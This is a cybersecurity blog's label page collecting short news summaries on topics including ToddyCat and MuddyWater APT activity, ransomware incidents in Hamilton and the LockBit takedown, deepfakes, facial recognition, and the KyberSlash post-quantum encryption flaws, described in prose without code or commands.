Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Threat Intelligence. Show all posts
Threat Intelligence
APT Group Cyber Attacks Data Leak Telecom Firm Threat Intelligence

ToddyCat APT Is Siphoning Data on 'Industrial Scale'

 

ToddyCat, an advanced persistent threat (APT) gang that targets the government and defence industries, has been seen collecting stolen data "on an industrial scale" from victim organisations in Asia-Pacific. 

Kaspersky researchers first disclosed details regarding the elusive gang's actions in 2022, despite the fact that it has been functioning since December 2020. ToddyCat is believed to be a Chinese-speaking gang, though its origins and ties are unknown.

Initially, the threat group targeted only certain organisations in Taiwan and Vietnam. When the ProxyLogon vulnerabilities in Microsoft Exchange Server were discovered in early 2021, it broadened the scope of its operations, now targeting multiple European and Asian organisations. 

ToddyCat upgraded its tools and strategies in 2023, and launched a long-running attack against government entities and telecom providers in multiple Asian countries. 

In Kaspersky's most recent review of the group, published last week, researchers Andrey Gunkin, Alexander Fedotov, and Natalya Shornikova explained the techniques the gang had lately been seen employing to exfiltrate massive volumes of data. 

“During the observation period, we noted that this group stole data on an industrial scale,” researchers explained. “To collect large volumes of data from many hosts, attackers need to automate the data harvesting process as much as possible, and provide several alternative means to continuously access and monitor systems they attack.”

One of the group's attacks was its predilection for creating many tunnels with various tools to gain access to the infrastructure of the organisations it targeted. This allowed the gang to continue using the compromised systems even after one of the tunnels was identified and eliminated, according to the experts.

ToddyCat used reverse SSH tunnels to get access to remote network services. The gang also employed SoftEther VPN, an open-source tool that allows for the establishment of VPN connections using a variety of popular protocols.

“In virtually every case we observed, the attackers renamed vpnserver_x64.exe to hide its purpose in the infected system,” the researchers added. “To transfer the tools to victim hosts, the attackers used their standard technique of copying files through shared resources, and downloaded files from remote resources using the curl utility.” 

To protect against the gang, the researchers advised defenders to add the resources and IP addresses of cloud providers that allow traffic tunnelling to their firewall deny lists. The researchers also recommended limiting the tools administrators can use to remotely access hosts.
Read more »
United Kingdom
AI Cameras Artificial Intelligence Technology Threat Intelligence United Kingdom

New AI Speed Cameras Record Drivers on Their Phones

 

New AI cameras have been deployed in vans to record drivers using their phones while driving or driving without a seatbelt. 

During a 12-hour evaluation in March, South Gloucestershire Council discovered 150 individuals not wearing seatbelts and seven drivers preoccupied by their cell phones. 

Pamela Williams, the council's road safety education manager, stated, "We believe that using technology like this will make people seriously consider their driving behaviour." 

According to figures, 425 people sustained injuries on South Gloucestershire roads in 2023, with 69 critically injured or killed. Throughout the survey, vans were equipped with mounted artificial intelligence (AI) technology. The devices monitored passing vehicles and determined whether drivers were infringing traffic laws. 

If a likely violation was spotted, the images were submitted to at least two specially experienced highways operators for inspection. There were no fixed penalty notices issued, and photographs that were not found to be in violation were automatically deleted. The authorities stated that it was just utilising the technology for surveys, not enforcement. 

Dave Adams, a road safety officer, helped conduct the area's first survey. He went on to say: "This is a survey so we can understand driver behaviour that will actually fit in with other bits of our road safety strategy to help make our roads safer.”

Ms Williams noted that "distracted drivers" and those who do not wear seatbelts are contributing contributors to road fatalities. "Working with our partners we want to reduce such dangerous driving and reduce the risks posed to both the drivers and other people." 

Fatalities remain high 

Dr Jamie Uff, Aecom's lead research specialist in charge of the technology's deployment, stated: Despite attempts by road safety agencies to modify behaviour via education, the number of individuals killed or badly wounded as a result of these risky driving practices remains high. 

"The use of technology like this, makes detection of these behaviours straightforward and is providing valuable insight to the police and policy makers.”
Read more »
Threat Intelligence
Cyber Attacks Defence System Iranian hackers Iron Dome Threat Intelligence

Iranian Hacker Group Blast Out Threatening Texts to Israelis

 

Handala, an Iranian cyber outfit, has claimed to have taken down the Iron Dome missile defence system and breached Israel's radars. 

A major cyber attack is believed to have unfolded when the Handala hacking group, which is renowned for targeting Israeli interests, broke through Israel's radar defences and bombarded Israeli citizens with text messages. 

The criminal group claimed it had broken into the radar systems and delivered 500,000 text messages to Israeli civilians with an urgent reminder that Israel has a short window of time to fix the breached systems. 

Handala's hack on Israel has been extensive, encompassing cyberattacks on radar and Iron Dome missile defence systems. Rada Electronics, a defence technology firm associated with Israel's objectives, reportedly fell prey to Handala's intrusion, with leaked dashboard images purporting to validate the hack. 

The Cyber Express, a local media outlet, contacted Rada Electronics to verify the claims of this intrusion. However, as of this writing, no official comment or answer has been issued. Furthermore, a service provider in charge of Israeli consumer alerts and Israel's Cyber Security College allegedly suffered significant data breaches, resulting in terabytes of exposed information. 

History of Handala hacker group 

As a pro-Palestian outfit, the hackers behind it were inspired by Handala, a key national emblem of the Palestinian people. Naji al-Ali, a political cartoonist, invented the figure Handala in 1969 and it took on its current shape in 1973.

It represents the spirit of Palestinian identity and struggle, which al-Ali frequently depicts in his cartoons. Handala, named after the Citrullus colocynthis plant found in Palestine, represents resilience, with strong roots and bitter fruit that regrows when cut. 

Since al-Ali's assassination in 1987, Handala has been a significant symbol of Palestinian identity, displayed frequently on walls and buildings throughout the West Bank, Gaza, and Palestinian refugee camps. It has also been popular as a tattoo and jewellery symbol, and it has been adopted by movements such as Boycott, Divestment, and Sanctions, as well as the Iranian Green Movement, which is now known as the Handala hacker group. 

Handala's characteristic posture, with the back turned and hands linked behind, represents a rejection of imposed solutions and sympathy with the marginalised. The character, who continues to be 10 years old, represents al-Ali's age when he left Palestine, and embodies the desire to return to his homeland.

Furthermore, the inspired hacking group claimed several such attacks to preserve its identity as a Palestinian supporter. Although official Israeli sources have yet to validate Handala's claims, security experts in Israel have expressed concerns about the likelihood of Iranian cyberattacks on critical national infrastructure.
Read more »
User Privacy
Biometric Authentication Cyber Security Facial Recognition Threat Intelligence User Privacy

Ban the Scan - Is Facial Recognition a Risk to Civil Liberties?

 

There are numerous voices around the world opposing the use of facial recognition technology. Many people believe facial recognition poses a severe threat to individual privacy, free speech, racial inequality, and data security. People who oppose it have solid grounds for doing so, and they have strong reservations of employing this technology in any form, citing its extremely high false positive rate and its implications for civil and personal liberties, specifically individual privacy.

Critics argue that facial recognition is biassed towards people of color, women, and children. Surveillance cameras are more common in places where immigrants live, which adds fuel to the flames. The explanation is the greater crime rate in those areas. Facial technology has not matured sufficiently, and its usage under such an environment worsens an already complex situation. The flaws in the justice system will expand as a result of the technology's inefficiency, contributing to harsher sentences and higher bails for those affected. 

Forced deployment

Despite its flaws, facial recognition technologies are used by police and other law enforcement agencies across the world. Surveillance is the key industry in which it is most widely applied. It is also commonly used in airports for passenger screening, as well as for housing and employment decisions. In 2020, San Francisco, Boston, and a few other localities restricted the use of facial recognition. 

According to an article on the Harvard blog by Alex Najibi, “police use face recognition to compare suspects’ photos to mugshots and driver’s license images; it is estimated that almost half of American adults – over 117 million people, as of 2016 – have photos within a facial recognition network used by law enforcement. This participation occurs without consent, or even awareness, and is bolstered by a lack of legislative oversight.” 

Private companies are also attempting to capitalise on biometric scanning in various ways and collecting user data for a variety of purposes. It is not new to blame Google and Meta for collecting excessive amounts of user data. The most recent clamour came when the World Coin initiative, founded by OpenAI CEO Sam Altman, suggested iris scanning as a requirement for coin ownership. These private-sector initiatives are troubling. 

Compared to other biometric systems such as fingerprints, iris scanning, and voice recognition, facial recognition has the highest error rate and is the most likely to cause privacy problems and bias against marginalised people and children.

The Electronic Frontier Foundation (EFF) and the Surveillance Technology Oversight Project (S.T.O.P.) oppose the use of facial recognition in any form. S.T.O.P. is based in New York, and its work focuses on civil rights. It also conducts study and activism on issues of surveillance technology abuse. 

Regarding the ban on the scan movement, S.T.O.P. says, "when we say scan, we mean the face scan feature of facial recognition technology. Surveillance, particularly facial recognition. It is a threat to free speech, freedom of association, and other civil liberties. Ban the Scan is a campaign and coalition built around passing two packages of bills that would ban facial recognition in a variety of contexts in New York City and New York State.”
Read more »
Threat Intelligence
Cyber Attacks DarkBeatC2 Iran hackers Spear Phishing Targeted Attack Threat Intelligence

Iranian Hackers Use New C2 Tool 'DarkBeatC2' in Recent Operation

 

MuddyWater, an Iranian threat actor, has used a novel command-and-control (C2) infrastructure known as DarkBeatC2 in its the most recent attack. This tool joins a list of previously used systems, including SimpleHarm, MuddyC3, PhonyC2, and MuddyC2Go.

In a recent technical study, Deep Instinct security researcher Simon Kenin stated that, despite periodic modifications in remote administration tools or changes in C2 frameworks, MuddyWater's strategies consistently follow a pattern.

MuddyWater, also known as Boggy Serpens, Mango Sandstorm, and TA450, is linked to Iran's Ministry of Intelligence and Security (MOIS) and has been operational since at least 2017. The group orchestrates spear-phishing attacks, which result in the installation authorised Remote Monitoring and Management (RMM) solutions on compromised systems. 

Prior intelligence from Microsoft connects the group to another Iranian threat cluster known as Storm-1084 (also known as DarkBit), which has been involved in devastating wiper assaults against Israeli entities.

The latest attack, which Proofpoint revealed last month, starts off with spear-phishing emails sent from compromised accounts. These emails include links or attachments hosted on services such as Egnyte, which facilitate the distribution of the Atera Agent software.

One of the URLs used is "kinneretacil.egnyte[.]com," with the subdomain "kinneretacil" referring to "kinneret.ac.il," an Israeli educational institution. 

Lord Nemesis (also known as Nemesis Kitten or TunnelVision) targeted a Rashim customer's supply chain. Lord Nemesis, who is accused of orchestrating operations against Israel, is employed by Najee Technology, a private contracting company linked to Iran's Islamic Revolutionary Guard Corps (IRGC). 

Kenin underlined the possible consequences of Rashim's breach, claiming that Lord Nemesis might have exploited the compromised email system to target Rashim's customers, giving the phishing emails a veneer of authenticity.

Although solid proof is missing, the timing and context of events indicate a possible coordination between the IRGC and MOIS to cause serious harm to Israeli entities.

Notably, the attacks leverage a collection of domains and IP addresses known as DarkBeatC2 to manage compromised endpoints. This is done using PowerShell code that creates communication with the C2 server after initial access. 

According to independent research by Palo Alto Networks Unit 42, MuddyWater used the Windows Registry's AutodialDLL function to sideload a malicious DLL and make connections with DarkBeatC2 domains.

This method entails creating persistence via a scheduled task that uses PowerShell to exploit the AutodialDLL registry entry and load the DLL for the C2 framework. MuddyWater's other approaches include sending a first-stage payload via spear-phishing emails and using DLL side-loading to execute malicious libraries. 

Upon successful communication, the infected machine receives PowerShell responses and downloads two further PowerShell scripts from the server. One script reads the contents of a file called "C:\ProgramData\SysInt.log" and sends them to the C2 server via an HTTP POST request, while the second script polls the server on a regular basis for new payloads. The particular nature of the subsequent payload is unknown, but Kenin emphasised that PowerShell remains critical to MuddyWater's operations.
Read more »
US Congress
Cyber Security Data Brokers National Security Privacy Bill Threat Intelligence US Congress

Data Brokers are Preparing to Challenge Privacy Legislation

 

Congress has been attempting to crack down on data brokers, and they are fighting back. In late March, the House voted unanimously to ban the sale of Americans' data to foreign rivals. And a data-collecting provision is included in the bill reauthorizing Section 702 of the Foreign Intelligence Surveillance Act (FISA), the contentious act that authorises the National Security Agency, which is set to expire later this month. 

Negotiations over FISA's reauthorization became so heated that House Speaker Mike Johnson pulled the bill from consideration in February. The most contentious issue was an amendment proposed by Rep. Warren Davidson (R-OH) that would bar data brokers from selling customer data to law enforcement and require a warrant to access Americans' information, according to Politico's Influence newsletter in February. 

National security hawks in Congress and local law enforcement groups joined forces to oppose the amendment, with the National Sheriffs' Association alleging in a letter to Congress that it would "kneecap law enforcement". 

"On House amendments, the Sheriffs of this great country don't usually keep score. But on this one, we will keep score and know who our friends are by their votes against Congressman Davidson's amendment, which further erodes the rule of law in our country and empowers the cartels," the letter stated. 

With FISA about to expire at the end of the month, Congress will undoubtedly bring it up again. Some legislators have indicated that they are unlikely to support the bill unless privacy updates are included. "We must have these amendments. Rep. Jim Jordan (R-OH), leader of the House Judiciary Committee, told Politico in February that "there's no way we're not going to have them.” 

Data brokers also seem to be entering the fight. Politico's Influence newsletter revealed that early this year, when the amendment was being discussed in the House, Relx, the parent company of data analytics company LexisNexis, based in the United Kingdom, hired the lobbying firm Venable. 

Recently, criticism of other Relx subsidiaries' data collecting and distribution policies has also surfaced. The New York Times revealed in March that a number of automakers were providing LexisNexis Risk Solutions with driving records of their clients, who then sold the data to insurance firms.
Read more »
User Security
Artificial Intelligence Deep Fakes Technology Threat Intelligence User Security

What are Deepfakes and How to Spot Them

 

Artificial intelligence (AI)-generated fraudulent videos that can easily deceive average viewers have become commonplace as modern computers have enhanced their ability to simulate reality.

For example, modern cinema relies heavily on computer-generated sets, scenery, people, and even visual effects. These digital locations and props have replaced physical ones, and the scenes are almost indistinguishable from reality. Deepfakes, one of the most recent trends in computer imagery, are created by programming AI to make one person look like another in a recorded video. 

What is a deepfake? 

Deepfakes resemble digital magic tricks. They use computers to create fraudulent videos or audio that appear and sound authentic. It's like filming a movie, but with real people doing things they've never done before. 

Deepfake technology relies on a complicated interaction of two fundamental algorithms: a generator and a discriminator. These algorithms collaborate within a framework called a generative adversarial network (GAN), which uses deep learning concepts to create and refine fake content. 

Generator algorithm: The generator's principal function is to create initial fake digital content, such as audio, photos, or videos. The generator's goal is to replicate the target person's appearance, voice, or feelings as closely as possible. 

Discriminator algorithm: The discriminator then examines the generator's content to determine if it appears genuine or fake. The feedback loop between the generator and discriminator is repeated several times, resulting in a continual cycle of improvement. 

Why do deepfakes cause concerns? 

Misinformation and disinformation: Deepfakes can be used to make convincing films or audio recordings of people saying or doing things they did not do. This creates a significant risk of spreading misleading information, causing reputational damage and influencing public opinion.

Privacy invasion: Deepfake technology has the ability to violate innocent people's privacy by manipulating their images or voices for malicious intents, resulting in harassment, blackmail, or even exploitation. 

Crime and fraud: Criminals can employ deepfake technology to imitate others in fraudulent operations, making it challenging for authorities to detect and prosecute those responsible. 

Cybersecurity: As deepfake technology progresses, it may become more difficult to detect and prevent cyberattacks based on modified video or audio recordings. 

How to detect deepfakes 

Though recent advances in generative Artificial Intelligence (AI) have increased the quality of deepfakes, we can still identify telltale signals that differentiate a fake video from an original.

- Pay close attention to the video's commencement. For example, many viewers overlooked the fact that the individual's face was still Zara Patel at the start of the viral Mandana film; the deepfake software was not activated until the person boarded the lift.

- Pay close attention to the person's facial expression throughout the video. Throughout a discourse or an act, there will be irregular variations in expression. 

- Look for lip synchronisation issues. There will be some minor audio/visual sync issues in the deepfake video. Always try to watch viral videos several times before deciding whether they are a deepfake or not. 

In addition to tools, government agencies and tech companies should collaborate to develop cross-platform detection tools that will stop the creation of deepfake videos.
Read more »
Threat Intelligence
Cloud Servers Semiconductor Chip Technology Threat Intelligence

Scaleway Introduces First RISC-V Servers on the Cloud

 

The world's first line of RISC-V servers has been introduced by European cloud operator Scaleway, which claims this is a "firm commitment to technological independence" in a market where companies are increasingly vying for control over semiconductor production.

The University of California, Berkeley developed the free and open instruction set architecture known as RISC-V, which has the potential to completely transform the semiconductor industry. Even though RISC-V is a relatively new design, it is already producing high performance levels, which makes it a competitive substitute for more well-known architectures like ARM and x86. 

Alibaba's T-Head TH1520 SoC, 16GB RAM, and 128GB eMMC storage are included in Scaleway's RISC-V servers. Priced at an affordable €15.99 a month (or €0.042 per hour), these Elastic Metal RV1 servers run on Debian, Ubuntu, or Alpine Linux and offer a 100 Mbit/s Ethernet network card as well as public IPv4 and IPv6 addresses. 

"We're delighted to be the first to offer RISC-V servers in the cloud, opening up new opportunities for our customers to meet growing demands for sovereignty, efficiency and sustainability. This innovation is a further step towards our vision of an independent and competitive European cloud", stated Damien Lucas, CEO at Scaleway. 

These servers are energy-efficient, using between 0.96W and 1.9W per 1.8GHz core, and dense, with a 52U rack able to accommodate up to 672 EM-RV1s. The intricate design consists of hand-soldered parts, 3D-printed blades, and a laser-cut chassis.

Scaleway claims that these servers are the outcome of months of research and development in its Paris laboratories. However, the decision to employ eMMC storage may be unfortunate. While inexpensive, eMMC storage is slower and less dependable than other types of storage, such as SSDs. This could affect the server's performance and lifetime. 

Scaleway introduced Arm servers in 2015, but eventually discontinued them in favour of AMD and Intel-based servers. With the introduction of these RISC-V servers, the company is clearly ready to try something new in the cloud server industry.
Read more »
Threat Intelligence
Canada City of Hamilton Cyber Attacks Municipal City Ransomware attack Threat Intelligence

Canadian City Says Timescale for Recovering from Ransomware Attack 'Unknown'

 

The Canadian city of Hamilton is still getting over a ransomware attack that compromised nearly every facet of municipal operations. 

Since February 25, when the ransomware attack was first reported, city officials have been working nonstop. Foundational services, such as waste collection, transit, and water and wastewater treatment, are functioning as of Wednesday.

However, the attack has impacted nearly every online payment system, forcing the city to rely on cash transactions and other manual processes. All fines, tickets, and tax payments must be made in person. 

Numerous municipal services, including cemeteries, child care centres, and public libraries, were reported by the city as having phone system or website issues. Before March 15, there will be no more city council meetings, and the city's libraries will no longer provide WiFi, public computers, printing services, or other services. 

“The City of Hamilton took swift action to investigate, protect systems and minimize impact on the community. We engaged a team of experts, insurers, legal counsel, and relevant authorities and [are] working diligently to restore the City’s system in a safe and secure manner,” the city said in a statement. “While a timeline for recovery is not yet known, the City is committed to resolving the situation as quickly and effectively as possible.” 

Hamilton is located roughly 40 miles from Toronto and has a population of nearly 600,000. The city stated that it is currently investigating whether citizen data was stolen. No ransomware group has claimed responsibility for the attack yet, and local officials have not responded to calls for comment. 

City officials held a press conference on Tuesday, and City Manager Marnie Cluckie stated that it is "impossible to know how long it will take us to get up and running again.” 

Cluckie declined to comment on whether the city is in talks with the ransomware group, stating that they will "do what is best for the city." She confirmed that the city has cyber insurance. 

During the press conference, Cluckie was asked if the attack would follow the same schedule as the Toronto Library, which dealt with troubles for more than four months after a ransomware attack. Cluckie claims the hired cyber specialists would only advise her that each assault and recovery is unique.

Hamilton is the second municipality in Canada to deal with a ransomware attack over the last week. Ponoka, a small town about an hour west of Edmonton, recently dealt with a ransomware attack that caused system failures for the government.
Read more »
Threat Intelligence
Cyber Security Global Operations Law Enforcement Agencies Ransomware Gang Threat Intelligence

UK Led Global Operations Disrupt LockBit's Criminal Network

 

One of the most notorious cybercrime organisations in the world has been hit by an unprecedented police operation involving the arrest and indictment of members of the Lockbit ransomware group by the FBI and Britain's National Crime Agency. 

The United States has charged two Russian citizens with deploying Lockbit ransomware against organisations and companies across the globe. Police in Poland and Ukraine made two arrests. 

The disruption of a criminal network, which has targeted over 2,000 victims globally, accepted over $120 million in ransom payments, and demanded hundreds of millions of dollars, was announced by the NCA, FBI, Europol, and U.S. Department of Justice at a meeting in London. 

Britain's National Crime Agency Cyber Division, in collaboration with the U.S. Department of Justice, the Federal Bureau of Investigation, and other law enforcement agencies seized control of websites used by Lockbit the gang and U.S. and British authorities said. The law enforcement agencies also went over and beyond by releasing internal data about the group through Lockbit's own website. 

“We have hacked the hackers," Graeme Biggar, director general of the National Crime Agency, told journalists. "We have taken control of their infrastructure, seized their source code and obtained keys that will help victims decrypt their systems.” 

The takedown, dubbed “Operation Cronos” was an international coalition of 10 countries, he added. “Together, we have arrested, indicted or sanctioned some of the perpetrators and we have gained unprecedented and comprehensive access to Lockbit’s systems”. 

Billions in damages 

Ransomware is malicious software that encrypts data; Lockbit and its affiliates profit by coercing victims into paying a ransom to decrypt or unlock that data using a digital key. In recent months, some of the world's largest organisations have been targeted by the gang's digital extortion tools.

Its affiliates are like-minded criminal groups that Lockbit recruits to carry out attacks with those tools. Those affiliates carry out the attacks and pay Lockbit a portion of the ransom, which is typically sought in cryptocurrency, making it difficult to track. 

Operation Cronos confiscated 34 of Lockbit's computers, detained two gang members, frozen 200 cryptocurrency accounts, and shuttered 14,000 "rouge accounts" used online to launch Lockbit's operations, the officials said. 

Lockbit has caused monetary losses totaling billions, the NCA's Biggar stated, to businesses who not only had to pay ransom payments, but also had to shoulder the cost of getting their systems back online. 

Before it was disrupted, Lockbit's website displayed an ever-growing gallery of victim organisations that was updated nearly daily. Next to their names were digital clocks that showed the number of days left to the deadline given to each organisation to provide ransom payment.
Read more »
Threat Intelligence
AI Model LLM Technology Threat Intelligence

Data Collaboration Platforms Ruling the Charts in Unlocking Sophisticated AI Models

 

Large Language Models (LLMs) have opened up exciting new possibilities for organisations in the field of artificial intelligence (AI), including enhanced decision-making, streamlined processes, and ground-breaking innovation.

Leading companies like Zendesk, Slack, Goldman Sachs, GitHub, and Unilever have used LLMs to enhance customer service, streamline coding processes, and effectively respond to consumer queries. However, given their strength, LLMs frequently prove inadequate when faced with the particular complexities of an organisation's environment. 

Training issues with refined AI models 

Businesses have resorted to employing organisation-specific data to fine-tune LLMs in order to conquer such challenges, resulting in highly customised AI models. 

These fine-tuned models provide a customised AI experience that significantly improves organisational performance. 

However, entering the field of fine-tuning AI models presents companies with three significant challenges. The task requires significant access to high-quality data, which is often a limited resource for many businesses. Second, LLMs are based on publicly available online content, which may result in biases and a lack of diversity and pluralism in created content.

Training fine-tuned models on consumers' personal data results in serious privacy concerns, perhaps leading to regulatory violations. 

Navigating the data issues in fine-tuning AI 

Fine-tuned AI models thrive on large, diversified datasets. However, numerous businesses confront difficulty in acquiring the essential data, particularly in niche or specialized domains. 

The challenge is worsened when the available data is unstructured or of low quality, making it difficult to extract useful insights. Beyond quantity, data relevance, quality, and the representation of varied perspectives are also critical factors. 

Generic AI models, like LLMs, mostly reflect the overall internet, ignoring the subtleties of unique communities or user groups. As a result, these models frequently generate biassed, culturally insensitive, or inadequate results, ignoring specific community experiences and perspectives.

To ensure that AI responses are fair, inclusive, and culturally aware, organisations must fill these models with data that truly represents societal diversity. 

Embracing data collaboration platforms 

Business leaders that embrace data collaboration platforms can reap numerous benefits. These platforms allow access to high-quality data, safeguard against legal challenges, and present a varied, pluralistic view of AI.

Business leaders should consider taking a few crucial actions in order to fully realise the potential of refined models.

Off-the-shelf AI solutions, however powerful, may lack the context and nuances unique to a certain organisation. Customisation is critical for aligning AI models with specific requirements. 

High-quality and diversified datasets are required for accurate and impartial AI results. Data collaborations can help models perform better and have more diversity.

Consider working together even with rival companies, in addition to alliances with partners and clients. The industry as a whole can gain from cooperative efforts that result in innovations and efficiencies. 

Models need to be updated with the latest statistics because data is perishable. Find sources of up-to-date information pertinent to AI's problem-solving objectives.
Read more »
Threat Intelligence
Cyber Attacks Endpoint Device Remote Access Tool Threat Intelligence

Attackers Employ TeamViewer to Gain Initial Access to Networks

 

Organisations have long utilised TeamViewer software to provide remote aid, collaboration, and access to endpoint devices. Like other authorised remote access technologies, it is often employed by attackers to gain initial access to target systems.

The most recent example is the pair of attempted ransomware deployment incidents that Huntress researchers recently came across. 

Unsuccessful ransomware deployment

The attacks that Huntress detected targeted two separate endpoint devices belonging to Huntress customers. Both incidents had failed attempts to install what seemed to be ransomware based on a leaked builder for LockBit 3.0 ransomware. 

Further investigation revealed that TeamViewer was the initial point of access for the attackers to both endpoints. The logs showed that the same threat actor was responsible for both occurrences, as the attacks originated from an endpoint with the same hostname.

After initially gaining access via TeamViewer, the threat actor used one of the computers for roughly seven minutes, and on the other, the attacker's session lasted for over ten minutes. 

How the attacker may have gained control of the TeamViewer instances in both incidents was not mentioned in Huntress' report. However, Huntress's senior threat intelligence analyst, Harlan Carvey, notes that a few of the TeamViewer logins seem to come from outdated systems. 

"The logs provide no indication of logins for several months or weeks before the threat actor's access," Carvery states. "In other instances, there are several legitimate logins, consistent with prior logins — username, workstation name, etc. — shortly before the threat actor's login.” 

Carvey believes that the threat actor may have been able to purchase access from an initial access broker (IAB) and that the credentials and connection information might have been stolen from other endpoints using a keyboard logger, infostealers, or other techniques. 

There have been other past instances when attackers employed TeamViewer in a similar manner. One was a campaign launched last May by a threat actor who wanted to install the XMRig crypto mining software on systems after gaining initial access through the tool. 

Another instance featured a data exfiltration campaign, which Huntress investigated in December. According to the incident logs, the threat actor established an initial foothold in the victim environment using TeamViewer. Much earlier, in 2020, Kaspersky reported on attacks against industrial control system setups that used remote access tools like RMS and TeamViewer for first access.
Read more »
UK Firm
Semiconductor Chip Technology Threat Intelligence UK Firm

Here's Why the World is Investing So Much in Semiconductors

 

Hannah Mullane, a BBC correspondent, recently visited Pragmatic Semiconductor, the UK's newest computer chip facility in Durham. Formerly a ceramic pipe factory, from the outside it looks like a large warehouse.

However, the large site is being turned into a sophisticated computer chip production hub. Pragmatic Semiconductor has already developed one production line, commonly known as a fabrication line or fab line. 

Enclosed within a spacious chamber, the manufacturing line is equipped with all the costly tools required to manufacture computer chips, and the air quality is constantly regulated to prevent any contamination while the manufacturing process is underway.

Pragmatic has the funds to create another such production line, and investment of £182 ($230 million) announced late this year will go into production lines 3 and 4. 

In addition to private investors, Pragmatic secured funding from British Patient Capital, a division of British Business Bank, and the government-backed UK Infrastructure Bank. However, the Cambridge-based firm will require a lot more funding to wrap up the eight production lines it has planned to install in the old pipe plant. 

From phones and computers to cars and washing machines, practically every product with an on/off switch is dependent on the production of computer chips, also known as semiconductors.

It is an industry that has experienced significant turmoil in recent years. During the pandemic, supply lines were disrupted, and geopolitical tensions arose in Asia, which manufactures 90% of the world's most advanced chips. 

David Moore, CEO of Pragmatic Semiconductor, the largest semiconductor maker in the UK, believes the industry will require a variety of semiconductors to handle "different kinds of problems" in the chip industry. 

Most semiconductors are composed of silicon, but his company uses an alternate process. Rather than sitting on a silicon wafer, Pragmatic's chips are built from a flexible thin sheet. This approach develops chips that are less expensive and faster to manufacture than traditional silicon chips.

"If you take a standard silicon manufacturing facility, it's going to take multiple years and billions of dollars to make," Mr Moore said. "Our fabrication plant can be 10 to 100 times cheaper depending on what you compare it with. In silicon, it will take three to six months to go from the start of the process all the way to a finished wafer product. For us, we can do that in less than 48 hours.” 

But it is no panacea. The most sophisticated silicon-based computer chips will still be required to run phones, computers, and other cutting-edge technology, even though flexible chips can be manufactured more quickly and at a lower cost.

A significant shortage of such chips in 2021, illustrated how reliant the global industry is on a few key suppliers. For example, 90% of the most advanced semiconductors manufactured worldwide are produced by Taiwan Semiconductor Manufacturing Company (TSMC). 

To reduce that dependency, governments are investing enormous sums to develop more robust local semiconductor sectors. In August 2022, the US government signed the US Chips Act, which pledged $52 billion (£41 billion) to increase domestic computer chip production. 

The European Union has its own initiative of €43 billion (£37 billion). On a smaller scale, the UK has agreed to invest £1 billion in the sector. Analysts believe that large chip manufacturers are responding to such government incentives. 

Following the US Chips Act, approximately 500 firms sought the US government for project financing, according to Hannah Dohmen, a research analyst at Georgetown's Centre for Security and Emerging Technology in Washington. 

Plants are planned for New York, Arizona, Texas, Ohio, and Idaho, she says. Other projects are also being planned outside of the United States and Europe.

"We're also seeing India attempt to enter the chip manufacturing space. A country that has a strong history in chip design but will be starting from scratch in manufacturing," Ms Dohmen added. "India is looking to be a big player in space, and with intensifying competition with China. This has prompted the US and other allied countries to strengthen tech cooperation with India.”

It all seems extremely promising, but establishing computer chip plants is not straightforward. TSMC's plans to develop advanced semiconductors in Arizona have stalled, with the company blaming a dearth of experienced labour. Security experts are also concerned that the rush to develop plants in Europe and the United States would simply replicate what already exists in Asia.
Read more »
Vulnerabilities and Exploits
Encryption Key KyberSlash Quantum Threat Intelligence Vulnerabilities and Exploits

Implementation Flaws Identified in Post-Quantum Encryption Algorithm

 

Two implementation flaws have been identified in the Kyber key encapsulation mechanism (KEM), an encryption standard intended to safeguard networks from future attacks by quantum computers. Collectively known as "KyberSlash," these flaws could allow cybercriminals to discover encryption keys. 

The encryption standard Kyber key encapsulation mechanism (KEM), designed to protect networks from future assaults by quantum computers, has two implementation vulnerabilities. Collectively referred to as "KyberSlash," these flaws might make it possible for hackers to acquire encryption keys. 

“Timing attacks of this nature are a derivative of broader ‘side channel’ attacks, which can be used to undermine any type of encryption, including both classical and post-quantum algorithms,” Andersen Cheng, founder of Post-Quantum, explained. “With this type of attack, the adversaries send fake (and known) ciphertext and measure how long it takes to decipher. They can then infer the timings for each attempt and reverse engineer the actual key-pair.” 

On December 1st, Franziskus Kiefer, Goutam Tamvada, and Karthikeyan Bhargavan—all researchers at the cybersecurity firm Cryspen—reported the vulnerabilities to Kyber's development team. The encryption standard had a patch released immediately, but since it wasn't classified as a security vulnerability, Cryspen started notifying projects in advance that they needed to implement the fix as of December 15. 

Google, Signal, and Mullvad VPN have all adopted versions of the Kyber post-quantum encryption standard; however, Mullvad VPN has since confirmed that the vulnerability does not affect their services.

Post-quantum encryption rush

Kyber was first submitted for assessment to the US National Institute of Standards and Technology (NIST) in 2017, as part of the organisation's competition to test and approve an encryption standard capable of safeguarding networks against future quantum computer attacks. Though a machine with an adequate amount of qubits to use Shor's algorithm to break RSA encryption and similar standards has yet to be developed, recent breakthroughs in scaling quantum computers and mounting speculation about "Harvest Now, Decrypt Later" attacks have generated increased interest in adopting post-quantum standards among governments and large businesses. 

Several algorithms put into the NIST competition were demonstrated to be susceptible to conventional attacks. These include the Rainbow and SIKE standards, the latter of which was overcome by KU Leuven researchers in 2022 in less than an hour using an average computer. In February 2023, a team from Sweden's KTH Royal Institute of Technology used highly complex deep learning-based side-channel attacks to destabilise Kyber's official implementation, CRYSTALS-Kyber. However, this approach was one of six for which NIST published draft standards last summer, with plans to finalise the competition later this year. 

Kyber flaws 

Meanwhile, the Kyber KEM has been adopted by a number of major organisations. Google announced in August 2023 that it will be employing Kyber-768 as a part of a hybrid system to safeguard Chrome browser traffic at the transport layer security level. Similar to this, Signal secured its "Signal Protocol," which is also used to ensure end-to-end encryption in Google and WhatsApp conversations, in September by implementing Kyber-1024 in conjunction with an elliptic curve key agreement protocol. 

This hybrid approach to leveraging post-quantum encryption standards is intended to safeguard network traffic against attack in case that new vulnerabilities are discovered. Since the KyberSlash vulnerabilities were identified, the researchers say that patches have been implemented by the Kyber development team and AWS. The team also cited a GitHub library written by Kudelski Security. When approached by a local media outlet, the cybersecurity firm stated that the listed code was not utilised in any of its commercial products and should not be used in production, but that it had still incorporated a patch for the KyberSlash vulnerabilities in a new version of the library. 

Nevertheless, Cheng believes it is a significant step forward for the post-quantum encryption community because its focus on flaws has shifted from vulnerabilities in the mathematics that underpins the standards to implementation attacks. “It will be the responsibility of each organisation implementing new encryption to ensure the implementation is robust,” stated Cheng. “That’s why it is so important that teams working on the migration to post-quantum encryption have deep engineering understanding and ideally, existing experience in deploying the cryptographic algorithms. “
Read more »
Threat Intelligence
CloudSEK Cookies Exploit Cyber Security Google Threat Intelligence

